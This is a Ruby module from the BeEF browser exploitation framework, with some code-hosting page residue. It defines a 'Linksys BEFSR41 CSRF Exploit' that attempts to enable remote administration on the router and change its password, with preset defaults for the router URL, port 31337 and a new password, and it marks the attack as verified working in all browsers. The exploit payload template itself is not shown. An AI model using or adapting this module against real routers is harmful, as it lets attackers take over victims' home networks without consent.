5c3e6f1575
git-svn-id: https://beef.googlecode.com/svn/trunk@1046 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
48 lines
1.5 KiB
Ruby
48 lines
1.5 KiB
Ruby
#
|
|
# Copyright 2011 Wade Alcorn wade@bindshell.net
|
|
#
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
|
|
# you may not use this file except in compliance with the License.
|
|
# You may obtain a copy of the License at
|
|
#
|
|
# http://www.apache.org/licenses/LICENSE-2.0
|
|
#
|
|
# Unless required by applicable law or agreed to in writing, software
|
|
# distributed under the License is distributed on an "AS IS" BASIS,
|
|
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
# See the License for the specific language governing permissions and
|
|
# limitations under the License.
|
|
#
|
|
class Linksys_befsr41_csrf < BeEF::Core::Command
|
|
|
|
#
|
|
# Defines and set up the command module.
|
|
#
|
|
def initialize
|
|
super({
|
|
'Name' => 'Linksys BEFSR41 CSRF Exploit',
|
|
'Description' => 'Attempts to enable remote administration and change the password on a Linksys BEFSR41 router.',
|
|
'Category' => 'Network',
|
|
'Author' => 'Martin Barbella',
|
|
'Data' => [
|
|
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://arbitrary:admin@192.168.1.1/'},
|
|
{'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'},
|
|
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
|
|
],
|
|
'File' => __FILE__
|
|
})
|
|
|
|
set_target({
|
|
'verified_status' => VERIFIED_WORKING,
|
|
'browser_name' => ALL
|
|
})
|
|
|
|
use_template!
|
|
end
|
|
|
|
def callback
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|